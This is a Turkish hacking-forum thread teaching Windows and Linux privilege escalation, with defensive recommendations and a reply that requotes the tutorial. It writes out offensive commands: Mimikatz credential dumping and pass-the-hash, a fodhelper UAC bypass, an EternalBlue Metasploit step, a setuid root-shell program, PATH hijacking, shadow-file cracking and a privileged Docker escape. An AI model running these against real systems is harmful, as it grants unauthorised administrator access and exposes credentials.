Privilege Escalation Windows/Linux

CH

Uzman üye
28 Ocak 2019
1,966
907
Siber

exploitdb.png



Selamlar TurkHackTeam,
Siber güvenlik dünyasında, yetkisiz erişimlerin önlenmesi ve sistem bütünlüğünün korunması büyük önem taşır. Bu bağlamda, "Privilege Escalation" (yetki yükseltme) kavramı, bir saldırganın veya yetkisiz bir kullanıcının mevcut yetki seviyesini artırarak daha yüksek yetkiler elde etmesini ve sistemde kritik değişiklikler yapabilmesini ifade eder. Bu konumuzda, privilege escalation tekniklerini, kullanılan yöntemleri ve bu tehditlere karşı alınabilecek önlemleri detaylı bir şekilde ele alacağız.

Öncelikle Privilege Escalation başlığımızı temelden alalım ve ardından derinlemesine inceleyelim.

1683190683030

Privilege Escalation Nedir?

Privilege escalation (yetki yükseltme), bir kullanıcının veya uygulamanın mevcut yetki seviyesini artırarak daha yüksek seviyede yetkiler elde etme sürecidir. Bu işlem, bir sistemde düşük seviyeli bir kullanıcıyken, daha yüksek yetkilerle (örneğin, yönetici veya root haklarıyla) işlem yapabilme imkanı sağlar.

Vertical Privilege Escalation (Dikey Yetki Yükseltme)
Bu durumda, bir kullanıcı daha yüksek bir yetki seviyesine yükselir. Örneğin, bir standart kullanıcı hesabının yönetici (root) yetkilerine erişim sağlaması.

Horizontal Privilege Escalation (Yatay Yetki Yükseltme)
Bu türde, bir kullanıcı kendi yetki seviyesindeki başka bir kullanıcının haklarını elde eder. Örneğin, bir kullanıcının aynı yetki seviyesine sahip başka bir kullanıcının verilerine veya hesaplarına erişmesi.


Privilege Escalation Sürecinde Kullanılan Yöntemler

Exploiting Vulnerabilities (Zafiyetlerin İstismarı)

Buffer Overflows (Tampon Taşması): Bellek taşması zafiyetleri, saldırganın kod yürütmesine veya yetki yükseltmesine izin verebilir.
Race Conditions (Yarış Durumları): Kaynak erişimi yarış durumları, saldırganın kritik sistem dosyalarına erişmesine veya bunları değiştirmesine olanak tanır.
Kernel Exploits (Çekirdek İstismarı): Çekirdek seviyesindeki zafiyetler, saldırganların doğrudan yönetici hakları elde etmesine izin verebilir.


1995802.png



Misconfigurations (Yanlış Yapılandırmalar)

Incorrect File Permissions (Yanlış Dosya İzinleri): Yanlış yapılandırılmış dosya izinleri, kullanıcıların yüksek yetkili dosyalara erişim sağlamasına neden olabilir.
Weak Sudo Configurations (Zayıf Sudo Yapılandırmaları): Yanlış yapılandırılmış sudo kuralları, kullanıcıların şifresiz yönetici yetkisi elde etmesine izin verebilir.

1298514.png



Credential Exploitation (Kimlik Bilgilerinin İstismarı)

Password Cracking (Parola Kırma): Zayıf veya varsayılan parolalar, saldırganların başka hesaplara erişim sağlamasına neden olabilir.
Token Hijacking (Token Ele Geçirme): Oturum tokenları veya erişim anahtarlarının ele geçirilmesi, saldırganların yüksek yetkili oturumlara erişimini sağlayabilir.

6170013.png



Abusing Trusted Relationships (Güven İlişkilerinin Kötüye Kullanımı)

Trust Exploitation (Güvenin Kötüye Kullanılması): Güvenilir sistemler veya kullanıcılar arasındaki ilişkilerin kötüye kullanılması, yetki yükseltmeye yol açabilir.
Service Exploitation (Servis İstismarı): Yanlış yapılandırılmış veya güvensiz servisler, saldırganların yüksek yetkili hesaplar elde etmesine izin verebilir.

1059643.png

Örnek Senaryolar

Linux'ta Privilege Escalation


SUID Binaries: Yanlış yapılandırılmış SUID bit'li dosyalar, saldırganların root yetkileriyle işlem yapmasına neden olabilir.

Bash:
find / -perm -4000 -type f 2>/dev/null

Kernel Exploits: Çekirdek zafiyetlerinden yararlanarak root yetkileri elde edilebilir. Bu tür zafiyetler genellikle Exploit-DB gibi veritabanlarında bulunabilir.

Kod:
CVE-XXXX-XXXX - Linux Kernel Exploit[/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER]
[SIZE=5][COLOR=rgb(255, 255, 255)][CENTER][SIZE=5][COLOR=rgb(255, 255, 255)][CENTER]


Windows'ta Privilege Escalation

Misconfigured Services
Yanlış yapılandırılmış servislerin haklarını yükseltmek için kullanılabilir. Örneğin, servislerin SYSTEM hesabıyla çalışması.

Token Manipulation
Oturum tokenlarının ele geçirilmesi ve SYSTEM tokenlarının kötüye kullanılmasıyla yetki yükseltme sağlanabilir.

Kod:
windows/token_manipulation[/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER]
[SIZE=5][COLOR=rgb(255, 255, 255)][CENTER][SIZE=5][COLOR=rgb(255, 255, 255)][CENTER]



Privilege escalation, sistem güvenliği için ciddi bir tehdittir ve hem yatay hem de dikey yetki yükseltme yollarıyla gerçekleştirilebilir. Bu zafiyetlerin ve yanlış yapılandırmaların anlaşılması ve önlenmesi, sistem güvenliğinin sağlanmasında kritik öneme sahiptir.


Temel girişimiz bittiğine göre derinlemesine incelemeye başlayabiliriz.

You-master-art-barging-closed-rooms.gif



Privilege Escalation Windows
Windows işletim sisteminde bu süreç, çeşitli zayıflıklardan ve yanlış yapılandırmalardan yararlanılarak gerçekleştirilebilir.

Misconfigured Permissions (Yanlış Yapılandırılmış İzinler)

File and Folder Permissions (Dosya ve Klasör İzinleri)


Yanlış yapılandırılmış dosya ve klasör izinleri, saldırganların yetki yükseltme yapmasına neden olabilir.

Örnek: Eğer bir dosya veya klasör, "Everyone" veya "Authenticated Users" grubuna yazma izni veriyorsa, saldırgan bu dosya veya klasörü değiştirerek kötü amaçlı bir kod çalıştırabilir.

Kontrol Komutu:

icacls C:\path\to\folder

Service Permissions (Servis İzinleri)

Windows servislerinin çalıştırma izinleri yanlış yapılandırılmış olabilir. Bu, saldırganların servislerin konfigürasyonunu değiştirerek yetki yükseltmelerine olanak tanır.

Kontrol Komutu:

sc qc ServiceName
turkhackteam.org // ch

Vulnerable Software (Güvenlik Açığı Olan Yazılımlar)

Outdated Software (Güncellenmemiş Yazılımlar)

Güncellenmemiş yazılımlar, bilinen zafiyetlere sahip olabilir ve bu zafiyetler exploit araçları kullanılarak kötüye kullanılabilir.

Kullanılabilecek Araçlar:


>>> Metasploit <<<
>>>
Nessus <<<

Metasploit Örneği:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue

Token Manipulation (Token Manipülasyonu)

Windows işletim sisteminde süreçler belirli token'larla çalışır. Bu token'lar manipüle edilerek yetki yükseltme sağlanabilir.

Örnek Araç:
Incognito

incognito.exe -t "Administrators"

Exploiting Kernel Vulnerabilities (Çekirdek Zafiyetlerinin İstismarı)

Kernel seviyesindeki zafiyetler, yüksek seviyeli yetki elde etmek için kullanılabilir. Bu zafiyetler, özellikle güncellenmemiş sistemlerde bulunur.

Exploit-DB'den Örnek:

CVE-XXXX-XXXX - Windows Kernel Exploit

DLL Hijacking (DLL Kaçırma)

Yanlış yapılandırılmış uygulamalar, DLL dosyalarını yanlış yerlerden yükleyebilir. Saldırganlar, kendi kötü amaçlı DLL dosyalarını oluşturup bu uygulamalar tarafından yüklenmesini sağlayabilir.

Örnek Kötü Amaçlı DLL Kodu:

#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
// Kötü amaçlı kod
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
turkhackteam.org // ch

Pass-the-Hash Attacks (Hash ile Kimlik Doğrulama)

Hash'ları kullanarak kimlik doğrulama işlemi gerçekleştirilir. Mimikatz gibi araçlarla bu hash'ları çıkarabilirsiniz.

Mimikatz Örneği:

mimikatz.exe
sekurlsa::logonpasswords

UAC Bypass (Kullanıcı Hesabı Denetimi Atlatma)

UAC'yi atlatmak için çeşitli teknikler kullanılabilir. Örneğin, fodhelper.exe kullanılarak kayıt defteri manipülasyonu yapılabilir.

Kayıt Defteri Manipülasyonu:

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v "DelegateExecute" /d "" /f
fodhelper.exe

Insecure Service Executables (Güvenli Olmayan Hizmet Yürütülebilir Dosyaları)

Bazı hizmetler güvenli olmayan dizinlerden veya yürütülebilir dosyalardan çalıştırılır. AccessChk aracıyla hizmet yürütülebilir dosya izinlerini kontrol edebilirsiniz.

AccessChk Örneği:

accesschk.exe -uwcqv "Authenticated Users" *

Named Pipe Impersonation (Adlandırılmış Boru Taklidi)

Named pipe'lar, Windows'da süreçler arası iletişim için kullanılır ve kötüye kullanılabilir. Kötü amaçlı bir yazılım, pipe aracılığıyla sistem hizmetlerini taklit edebilir.

Mimikatz Örneği:

mimikatz.exe
privilege::debug
token::elevate

Token Duplication (Token Çoğaltma)

Windows token sisteminde, mevcut bir sürecin token'ını kopyalayarak yetki yükseltme gerçekleştirilebilir. Mimikatz aracı bu amaçla kullanılabilir.

Mimikatz Örneği:


mimikatz.exe
sekurlsa :: pth /user:Administrator /ntlm:<hash> /run:cmd.exe
Dikkat: "sekurlsa :: pth" komutunu çalıştırırken arasına boşluk koymayınız.


Önleme ve Güvenlik Tavsiyeleri

Güncellemeler ve Yamalar

>> Tüm yazılımları ve işletim sistemini güncel tutarak bilinen zafiyetlerin istismar edilmesini önleyin.
turkhackteam.org // ch

Güvenli Yapılandırmalar

>> Sudoers dosyasını dikkatlice yapılandırın.
>> SUID bit'lerinin yalnızca gerçekten gerekli dosyalarda olmasını sağlayın.
>> Hizmetlerin ve uygulamaların doğru izinlerle çalıştırıldığından emin olun.

Kullanıcı Hakları Yönetimi

>> Kullanıcı haklarını minimum ayrıcalık ilkesine göre verin.
>> Yalnızca gerektiğinde yönetici haklarını kullanın.

İzleme ve Loglama

>> Sistem loglarını düzenli olarak izleyin ve analiz edin.
>> Anormal aktiviteleri tespit etmek için log analiz araçları kullanın.

Uygulama Güvenliği

>> Uygulamalarınızı düzenli olarak güvenlik açıklarına karşı tarayın.
>> Güvenlik duvarları ve anti-virüs yazılımları kullanarak sistemi koruyun.

Saldırı Tespit Sistemleri (IDS) ve İzleme

>> IDS ve IPS (Intrusion Prevention Systems) kullanarak yetki yükseltme denemelerini tespit edin. OSSEC veya Snort gibi açık kaynak IDS araçları kullanılabilir.

Güvenlik Duvarı Kuralları

>> Güvenlik duvarı kurallarını yapılandırarak yalnızca gerekli trafiğe izin verin. iptables veya Windows Firewall kullanarak ağ erişimini kısıtlayın.

Kullanıcı ve Grup Yönetimi

>> Kullanıcı ve grup izinlerini düzenli olarak kontrol edin. Gereksiz kullanıcı hesaplarını ve grupları kaldırın.

Uygulama Whitelisting

>> Yalnızca onaylı uygulamaların çalışmasına izin veren bir whitelisting çözümü kullanın. AppLocker veya SELinux gibi çözümler kullanılabilir.

Güçlü Kimlik Doğrulama ve Parola Politikaları

>> Güçlü parolalar ve çok faktörlü kimlik doğrulama (MFA) kullanarak hesap güvenliğini artırın. Parola politikalarını uygulayarak zayıf parolaların kullanımını önleyin.

Kapsamlı Güvenlik Eğitimleri

>> Kullanıcılara ve sistem yöneticilerine yönelik düzenli güvenlik eğitimleri sağlayın. Güvenlik farkındalığı artırarak sosyal mühendislik saldırılarını önleyin.

turkhackteam.org // ch

Araçlar ve Ek Kaynaklar

Windows Araçları

>> Sysinternals Suite: Gelişmiş sistem yönetim ve izleme araçları sağlar.

44955850


>>
PowerSploit: PowerShell üzerinden saldırı ve yetki yükseltme modülleri içerir.

powersploit-logo.svg

Ek Kaynaklar

>> Exploit Database (Exploit-DB): Güncel exploit'ler ve zafiyetler için kaynak.

d013b9be540d7725fe2a7f6537d0b6c5.jpg

turkhackteam.org // ch
>> OWASP: Güvenlik açıkları ve güvenlik önlemleri hakkında geniş bilgi sunar.

images

turkhackteam.org // ch
Windows sistemlerinde privilege escalation, siber güvenlikte kritik bir zayıf noktadır. Bu zayıflıkları anlamak ve önlemek için sürekli olarak sistemlerinizi güncel tutmalı, doğru yapılandırmalar yapmalı ve güvenlik önlemlerini uygulamalısınız. Hem saldırı tespit sistemleri hem de düzenli eğitimler, bu tür saldırılara karşı korunmada önemlidir.


214883789-1f48e8ab-9de0-4693-b0f2-94f42e433c4f.png

Linux Privilege Escalation

Privilege escalation (yetki yükseltme), bir kullanıcının mevcut yetkilerini artırarak daha yüksek seviyede yetkiler elde etmesini sağlar. Linux işletim sisteminde bu süreç, çeşitli zayıflıklardan ve yanlış yapılandırmalardan yararlanılarak gerçekleştirilebilir.

Sudo Misconfigurations (Sudo Yanlış Yapılandırmaları)

Sudoers File (Sudoers Dosyası)

Yanlış yapılandırılmış sudoers dosyası, saldırganların yetki yükseltme yapmasına neden olabilir. /etc/sudoers dosyasını düzenlerken dikkatli olunmalıdır.
turkhackteam.org // ch
Sudoers Dosyasını Kontrol Etme:

NOPASSWD Option (Şifresiz Çalıştırma)

Bazı komutlar şifresiz çalıştırılabilir. Bu komutları kullanarak yetki yükseltebilirsiniz.

Örnek:


sudo /path/to/vulnerable/command

SUID and SGID Binaries (SUID ve SGID İkili Dosyaları)

SUID bit set edilmiş dosyalar, dosyanın sahibi olarak çalıştırılabilir. Bu, saldırganların root hakları elde etmesine neden olabilir.

SUID Dosyalarını Bulma:


find / -perm -4000 -type f 2>/dev/null
turkhackteam.org // ch
Örnek Exploit:

// Example of exploiting SUID binary
#include <stdio.h>
#include <stdlib.h>

int main() {
setuid(0);
system("/bin/bash");
return 0;
}

Kernel Exploits (Kernel Zafiyetlerinin İstismarı)

Kernel seviyesindeki zafiyetler, yüksek seviyeli yetki elde etmek için kullanılabilir. Bu zafiyetler, özellikle güncellenmemiş sistemlerde bulunur.

Exploit-DB'den Örnek:


CVE-XXXX-XXXX - Linux Kernel Exploit

Misconfigured Services (Yanlış Yapılandırılmış Servisler)

Cron Jobs (Cron İşleri)

Yanlış yapılandırılmış cron job'lar yetki yükseltme için kullanılabilir. /etc/crontab ve /etc/cron.d/ dizinlerini kontrol edin.

Cron Dosyasını Kontrol Etme:

turkhackteam.org // ch
cat /etc/crontab

Writable /etc/passwd or /etc/shadow (Yazılabilir /etc/passwd veya /etc/shadow Dosyaları)

Bu dosyaların yazılabilir olması büyük bir güvenlik açığıdır. Kullanıcı parolalarını değiştirerek root yetkisi alabilirsiniz.

Exploiting NFS Shares (NFS Paylaşımlarının İstismarı)

Yanlış yapılandırılmış NFS paylaşım izinleri yetki yükseltmeye yol açabilir. showmount -e komutuyla paylaşımları kontrol edin.

NFS Paylaşımlarını Kontrol Etme:


showmount -e <server>

PATH Variable Manipulation (PATH Değişkeni Manipülasyonu)

Yanlış yapılandırılmış PATH değişkeni yetki yükseltmeye neden olabilir. Kullanıcı PATH değişkenini değiştirerek kendi zararlı komutunu çalıştırabilir.

PATH Değişkenini Manipüle Etme:

turkhackteam.org // ch

export PATH=/tmp:$PATH
echo "/bin/bash" > /tmp/ls
chmod +x /tmp/ls
ls

NFS Shares Exploitation (NFS Paylaşımlarının İstismarı)

NFS paylaşımlarında yanlış izinler yetki yükseltmeye yol açabilir. Root squash özelliği devre dışı bırakılmışsa, istemciler root haklarıyla dosya oluşturabilir.

NFS Paylaşımını Montajlama:


showmount -e <server>
mount -t nfs <server>:<export> /mnt

Exploiting Weak Passwords (Zayıf Parolaların İstismarı)

Zayıf veya varsayılan parolalar, sistemdeki diğer kullanıcı hesaplarına erişim sağlar. John the Ripper veya Hydra gibi araçlarla parola kırma işlemleri yapılabilir.

John the Ripper Örneği:


john /etc/shadow

File Capabilities (Dosya Yetenekleri)

Linux'da belirli dosyalara özel yetenekler (capabilities) atanabilir. Yanlış yapılandırılmış yetenekler yetki yükseltmeye yol açabilir.

Yetenekleri Kontrol Etme:

turkhackteam.org // ch
getcap /path/to/file
setcap cap_setuid+ep /path/to/binary

Docker Breakout (Docker Kaçışı)

Docker konteynerleri, ana sisteme erişim sağlamak için kötüye kullanılabilir. Privileged modda çalışan konteynerler özellikle risklidir.

Docker Kaçış Örneği:


docker run -v /:/hostOS -it --privileged <image> /bin/bash


 
Son düzenleme:

CH

Uzman üye
28 Ocak 2019
1,966
907
Siber

Önleme ve Güvenlik Tavsiyeleri

Güncellemeler ve Yamalar

>> Tüm yazılımları ve işletim sistemini güncel tutarak bilinen zafiyetlerin istismar edilmesini önleyin.

Güvenli Yapılandırmalar

>> Sudoers dosyasını dikkatlice yapılandırın.
>> SUID bit'lerinin yalnızca gerçekten gerekli dosyalarda olmasını sağlayın.
>> Hizmetlerin ve uygulamaların doğru izinlerle çalıştırıldığından emin olun.

Kullanıcı Hakları Yönetimi

>> Kullanıcı haklarını minimum ayrıcalık ilkesine göre verin.
>> Yalnızca gerektiğinde yönetici haklarını kullanın.

turkhackteam.org // ch

İzleme ve Loglama

>> Sistem loglarını düzenli olarak izleyin ve analiz edin.
>> Anormal aktiviteleri tespit etmek için log analiz araçları kullanın.

Uygulama Güvenliği

>> Uygulamalarınızı düzenli olarak güvenlik açıklarına karşı tarayın.
>> Güvenlik duvarları ve anti-virüs yazılımları kullanarak sistemi koruyun.

Saldırı Tespit Sistemleri (IDS) ve İzleme

>> IDS ve IPS (Intrusion Prevention Systems) kullanarak yetki yükseltme denemelerini tespit edin. OSSEC veya Snort gibi açık kaynak IDS araçları kullanılabilir.

Güvenlik Duvarı Kuralları

>> Güvenlik duvarı kurallarını yapılandırarak yalnızca gerekli trafiğe izin verin. iptables veya firewalld kullanarak ağ erişimini kısıtlayın.

Örnek Güvenlik Duvarı Kuralları:


iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -j DROP
turkhackteam.org // ch

Kullanıcı ve Grup Yönetimi

>> Kullanıcı ve grup izinlerini düzenli olarak kontrol edin. Gereksiz kullanıcı hesaplarını ve grupları kaldırın.

Kullanıcı ve Grup Bilgilerini Görüntüleme:


cat /etc/passwd
cat /etc/group

Uygulama Whitelisting

>> Yalnızca onaylı uygulamaların çalışmasına izin veren bir whitelisting çözümü kullanın. AppArmor veya SELinux gibi çözümler kullanılabilir.

Güçlü Kimlik Doğrulama ve Parola Politikaları

>> Güçlü parolalar ve çok faktörlü kimlik doğrulama (MFA) kullanarak hesap güvenliğini artırın. Parola politikalarını uygulayarak zayıf parolaların kullanımını önleyin.

Parola Politikası Uygulama:

turkhackteam.org // ch

chage -m 1 -M 90 -W 7 -I 30 username​



Kapsamlı Güvenlik Eğitimleri

Kullanıcılara ve sistem yöneticilerine yönelik düzenli güvenlik eğitimleri sağlayın. Güvenlik farkındalığı artırarak sosyal mühendislik saldırılarını önleyin.

Araçlar ve Ek Kaynaklar

Linux Araçları

>> LinEnum: Linux ortamında yetki yükseltme yollarını otomatik olarak tespit eder.
IGrj7w.png

>> Linux Exploit Suggester: Sistemdeki zafiyetleri analiz ederek uygun exploit önerir.

turkhackteam.org // ch
linpeas.JPG

Ek Kaynaklar

>> Exploit Database (Exploit-DB): Güncel exploit'ler ve zafiyetler için kaynak.

exploit-db-logo.png

>> GTFOBins: Linux komutlarının kötüye kullanılabilirlik durumlarını gösterir.
39499534

>> OWASP: Güvenlik açıkları ve güvenlik önlemleri hakkında geniş bilgi sunar.

turkhackteam.org // ch
owasp_logo.png


Linux sistemlerinde privilege escalation, siber güvenlikte kritik bir zayıf noktadır. Bu zayıflıkları anlamak ve önlemek için sürekli olarak sistemlerinizi güncel tutmalı, doğru yapılandırmalar yapmalı ve güvenlik önlemlerini uygulamalısınız. Hem saldırı tespit sistemleri hem de düzenli eğitimler, bu tür saldırılara karşı korunmada önemlidir.



Ek Bilgi ve Dökümanlar

Sudo Misconfigurations (Sudo Yanlış Yapılandırmaları)

>> Yanlış yapılandırılmış sudoers dosyası ve şifresiz çalıştırma seçenekleri, saldırganların yetki yükseltme yapmasına neden olabilir. Sudoers dosyasını dikkatle yapılandırarak ve şifresiz komut çalıştırma seçeneklerini minimize ederek bu tür saldırılara karşı önlem alınabilir.

SUID and SGID Binaries (SUID ve SGID İkili Dosyaları)

>> SUID bit set edilmiş dosyalar, dosyanın sahibi olarak çalıştırılabilir. Bu nedenle, bu tür dosyaların sistemdeki varlığı düzenli olarak kontrol edilmelidir. SUID ve SGID bit'lerinin yalnızca gerçekten gerekli dosyalarda olmasını sağlayın.

Kernel Exploits (Kernel Zafiyetlerinin İstismarı)

>> Kernel seviyesindeki zafiyetler, yüksek seviyeli yetki elde etmek için kullanılabilir. Sistem güncellemeleri düzenli olarak uygulanmalı ve kernel zafiyetlerine karşı dikkatli olunmalıdır.
turkhackteam.org // ch

Misconfigured Services (Yanlış Yapılandırılmış Servisler)

>> Yanlış yapılandırılmış cron job'lar, yazılabilir /etc/passwd veya /etc/shadow dosyaları gibi servisler yetki yükseltme için kullanılabilir. Bu servislerin ve dosyaların izinleri düzenli olarak kontrol edilmelidir.

Exploiting NFS Shares (NFS Paylaşımlarının İstismarı)

>> Yanlış yapılandırılmış NFS paylaşım izinleri yetki yükseltmeye yol açabilir. NFS paylaşımlarının izinleri ve yapılandırmaları dikkatle incelenmeli ve güvenli hale getirilmelidir.

PATH Variable Manipulation (PATH Değişkeni Manipülasyonu)

>> Yanlış yapılandırılmış PATH değişkeni yetki yükseltmeye neden olabilir. Kullanıcı PATH değişkenini değiştirerek kendi zararlı komutunu çalıştırabilir, bu nedenle PATH değişkeni dikkatle yönetilmelidir.

Docker Breakout (Docker Kaçışı)

>> Docker konteynerleri, ana sisteme erişim sağlamak için kötüye kullanılabilir. Özellikle privileged modda çalışan konteynerler risklidir. Docker konteynerlerinin izinleri ve yapılandırmaları dikkatle incelenmelidir.
turkhackteam.org // ch

Exploiting Weak Passwords (Zayıf Parolaların İstismarı)

>> Zayıf veya varsayılan parolalar, sistemdeki diğer kullanıcı hesaplarına erişim sağlar. Parolaların güçlü olması ve düzenli olarak değiştirilmesi önemlidir. John the Ripper veya Hydra gibi araçlarla parola kırma işlemleri yapılabilir.

File Capabilities (Dosya Yetenekleri)

>> Linux'da belirli dosyalara özel yetenekler (capabilities) atanabilir. Yanlış yapılandırılmış yetenekler yetki yükseltmeye yol açabilir. Yeteneklerin düzenli olarak kontrol edilmesi ve sadece gerekli dosyalara atanması gereklidir.

Monitoring and Logging (İzleme ve Loglama)

>> Sistem loglarını düzenli olarak izleyin ve analiz edin. Anormal aktiviteleri tespit etmek için log analiz araçları kullanın. İzleme ve loglama, potansiyel yetki yükseltme girişimlerini erken tespit etmenize yardımcı olabilir.

Security Patches (Güvenlik Yamaları)

>> Tüm yazılımları ve işletim sistemini güncel tutarak bilinen zafiyetlerin istismar edilmesini önleyin. Güncellemeler ve yamalar, güvenlik zafiyetlerinin kapatılmasında kritik bir rol oynar.

User and Group Management (Kullanıcı ve Grup Yönetimi)

>> Kullanıcı haklarını minimum ayrıcalık ilkesine göre verin. Kullanıcı ve grup izinlerini düzenli olarak kontrol edin. Gereksiz kullanıcı hesaplarını ve grupları kaldırın. Bu, saldırganların yetki yükseltme fırsatlarını minimize eder.

Application Whitelisting (Uygulama Whitelisting)

>> Yalnızca onaylı uygulamaların çalışmasına izin veren bir whitelisting çözümü kullanın. AppArmor veya SELinux gibi çözümler kullanılabilir.

Multi-Factor Authentication (MFA)

>> Güçlü parolalar ve çok faktörlü kimlik doğrulama (MFA) kullanarak hesap güvenliğini artırın. Parola politikalarını uygulayarak zayıf parolaların kullanımını önleyin.
turkhackteam.org // ch

Security Education (Güvenlik Eğitimi)

>> Kullanıcılara ve sistem yöneticilerine yönelik düzenli güvenlik eğitimleri sağlayın. Güvenlik farkındalığı artırarak sosyal mühendislik saldırılarını önleyin. Eğitim, kullanıcıların bilinçli davranarak saldırı riskini azaltmalarını sağlar.


T%C3%BCrkHackTeam_Logo.png
q95944r.png



euwl1gm.png



TURKHACKTEAM.ORG // CH


 

boyka48

Yeni üye
7 Nis 2013
39
4
alert("Artık Burdayım")

exploitdb.png



Selamlar TurkHackTeam,
Siber güvenlik dünyasında, yetkisiz erişimlerin önlenmesi ve sistem bütünlüğünün korunması büyük önem taşır. Bu bağlamda, "Privilege Escalation" (yetki yükseltme) kavramı, bir saldırganın veya yetkisiz bir kullanıcının mevcut yetki seviyesini artırarak daha yüksek yetkiler elde etmesini ve sistemde kritik değişiklikler yapabilmesini ifade eder. Bu konumuzda, privilege escalation tekniklerini, kullanılan yöntemleri ve bu tehditlere karşı alınabilecek önlemleri detaylı bir şekilde ele alacağız.

Öncelikle Privilege Escalation başlığımızı temelden alalım ve ardından derinlemesine inceleyelim.

1683190683030

Privilege Escalation Nedir?

Privilege escalation (yetki yükseltme), bir kullanıcının veya uygulamanın mevcut yetki seviyesini artırarak daha yüksek seviyede yetkiler elde etme sürecidir. Bu işlem, bir sistemde düşük seviyeli bir kullanıcıyken, daha yüksek yetkilerle (örneğin, yönetici veya root haklarıyla) işlem yapabilme imkanı sağlar.

Vertical Privilege Escalation (Dikey Yetki Yükseltme)
Bu durumda, bir kullanıcı daha yüksek bir yetki seviyesine yükselir. Örneğin, bir standart kullanıcı hesabının yönetici (root) yetkilerine erişim sağlaması.

Horizontal Privilege Escalation (Yatay Yetki Yükseltme)
Bu türde, bir kullanıcı kendi yetki seviyesindeki başka bir kullanıcının haklarını elde eder. Örneğin, bir kullanıcının aynı yetki seviyesine sahip başka bir kullanıcının verilerine veya hesaplarına erişmesi.


Privilege Escalation Sürecinde Kullanılan Yöntemler

Exploiting Vulnerabilities (Zafiyetlerin İstismarı)

Buffer Overflows (Tampon Taşması): Bellek taşması zafiyetleri, saldırganın kod yürütmesine veya yetki yükseltmesine izin verebilir.
Race Conditions (Yarış Durumları): Kaynak erişimi yarış durumları, saldırganın kritik sistem dosyalarına erişmesine veya bunları değiştirmesine olanak tanır.
Kernel Exploits (Çekirdek İstismarı): Çekirdek seviyesindeki zafiyetler, saldırganların doğrudan yönetici hakları elde etmesine izin verebilir.


1995802.png



Misconfigurations (Yanlış Yapılandırmalar)

Incorrect File Permissions (Yanlış Dosya İzinleri): Yanlış yapılandırılmış dosya izinleri, kullanıcıların yüksek yetkili dosyalara erişim sağlamasına neden olabilir.
Weak Sudo Configurations (Zayıf Sudo Yapılandırmaları): Yanlış yapılandırılmış sudo kuralları, kullanıcıların şifresiz yönetici yetkisi elde etmesine izin verebilir.

1298514.png



Credential Exploitation (Kimlik Bilgilerinin İstismarı)

Password Cracking (Parola Kırma): Zayıf veya varsayılan parolalar, saldırganların başka hesaplara erişim sağlamasına neden olabilir.
Token Hijacking (Token Ele Geçirme): Oturum tokenları veya erişim anahtarlarının ele geçirilmesi, saldırganların yüksek yetkili oturumlara erişimini sağlayabilir.

6170013.png



Abusing Trusted Relationships (Güven İlişkilerinin Kötüye Kullanımı)

Trust Exploitation (Güvenin Kötüye Kullanılması): Güvenilir sistemler veya kullanıcılar arasındaki ilişkilerin kötüye kullanılması, yetki yükseltmeye yol açabilir.
Service Exploitation (Servis İstismarı): Yanlış yapılandırılmış veya güvensiz servisler, saldırganların yüksek yetkili hesaplar elde etmesine izin verebilir.

1059643.png

Örnek Senaryolar

Linux'ta Privilege Escalation


SUID Binaries: Yanlış yapılandırılmış SUID bit'li dosyalar, saldırganların root yetkileriyle işlem yapmasına neden olabilir.

Bash:
find / -perm -4000 -type f 2>/dev/null

Kernel Exploits: Çekirdek zafiyetlerinden yararlanarak root yetkileri elde edilebilir. Bu tür zafiyetler genellikle Exploit-DB gibi veritabanlarında bulunabilir.

Kod:
CVE-XXXX-XXXX - Linux Kernel Exploit[/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER]
[SIZE=5][COLOR=rgb(255, 255, 255)][CENTER][SIZE=5][COLOR=rgb(255, 255, 255)][CENTER][SIZE=5][COLOR=rgb(255, 255, 255)][CENTER]



Windows'ta Privilege Escalation

Misconfigured Services
Yanlış yapılandırılmış servislerin haklarını yükseltmek için kullanılabilir. Örneğin, servislerin SYSTEM hesabıyla çalışması.

Token Manipulation
Oturum tokenlarının ele geçirilmesi ve SYSTEM tokenlarının kötüye kullanılmasıyla yetki yükseltme sağlanabilir.

Kod:
windows/token_manipulation[/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER]
[SIZE=5][COLOR=rgb(255, 255, 255)][CENTER][SIZE=5][COLOR=rgb(255, 255, 255)][CENTER][SIZE=5][COLOR=rgb(255, 255, 255)][CENTER]




Privilege escalation, sistem güvenliği için ciddi bir tehdittir ve hem yatay hem de dikey yetki yükseltme yollarıyla gerçekleştirilebilir. Bu zafiyetlerin ve yanlış yapılandırmaların anlaşılması ve önlenmesi, sistem güvenliğinin sağlanmasında kritik öneme sahiptir.


Temel girişimiz bittiğine göre derinlemesine incelemeye başlayabiliriz.

You-master-art-barging-closed-rooms.gif



Privilege Escalation Windows
Windows işletim sisteminde bu süreç, çeşitli zayıflıklardan ve yanlış yapılandırmalardan yararlanılarak gerçekleştirilebilir.

Misconfigured Permissions (Yanlış Yapılandırılmış İzinler)

File and Folder Permissions (Dosya ve Klasör İzinleri)


Yanlış yapılandırılmış dosya ve klasör izinleri, saldırganların yetki yükseltme yapmasına neden olabilir.

Örnek: Eğer bir dosya veya klasör, "Everyone" veya "Authenticated Users" grubuna yazma izni veriyorsa, saldırgan bu dosya veya klasörü değiştirerek kötü amaçlı bir kod çalıştırabilir.

Kontrol Komutu:



Service Permissions (Servis İzinleri)

Windows servislerinin çalıştırma izinleri yanlış yapılandırılmış olabilir. Bu, saldırganların servislerin konfigürasyonunu değiştirerek yetki yükseltmelerine olanak tanır.

Kontrol Komutu:



turkhackteam.org // ch

Vulnerable Software (Güvenlik Açığı Olan Yazılımlar)

Outdated Software (Güncellenmemiş Yazılımlar)

Güncellenmemiş yazılımlar, bilinen zafiyetlere sahip olabilir ve bu zafiyetler exploit araçları kullanılarak kötüye kullanılabilir.

